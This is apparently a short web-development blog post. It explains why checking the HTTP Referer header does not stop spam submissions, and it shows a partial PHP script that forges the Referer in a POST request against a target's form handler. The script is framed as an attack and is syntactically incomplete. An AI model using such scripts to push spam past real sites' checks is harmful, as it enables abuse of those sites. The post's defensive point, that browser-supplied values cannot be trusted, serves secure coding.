How to bypass the REFERER security check


The http-Referer header is nothing more than the web address of the page that referred a browser to the actual page.
If you are trying to "protect" a file by making sure that the http-referer value (or any other browser passed variable) is your own website, you can be bypassed by this simple technique. You cannot trust any browser passed variables.

Suppose you have a form that requests the user to enter his user name and a comment. The form sends the user inputs to, let say formprocess.php. In the formprocess.php you check if the http-referer is your site to prevent from spam comments:

if ( eregi ( "", $_SERVER['HTTP_REFERER'] ) )
// do something
echo "Nice try";

The problem here is that you deal with a browser passed variable. An attacker can easily bypass your check by giving your site as referer.

Look at this script:

// the site we want to attack
$host = "";
// the file we want to attack
$file = "formprocess.php";

// construct a header for our request

$hdrs = array( 'http' => array(

'method' => "POST",

'header'=> "accept-language: en\r\n" .

"Host: $host\r\n" .

"Referer: http://$host\r\n" . // Setting the http-referer

"Content-Type: application/x-www-form-urlencoded\r\n" .
"Content-Length: 33\r\n\r\n" .




// get the requested page from the server

// with our header as a request-header

$context = stream_context_create($hdrs);

$fp = fopen("http://" . $host . "/" . $file, 'r', false, $context);




Create a formprocess.php file and try to get it with this script, you will see that the if statment in formprocess.php is useless.
Loading related posts...


Post a Comment

2010 WEBSITE20. All rights reserved.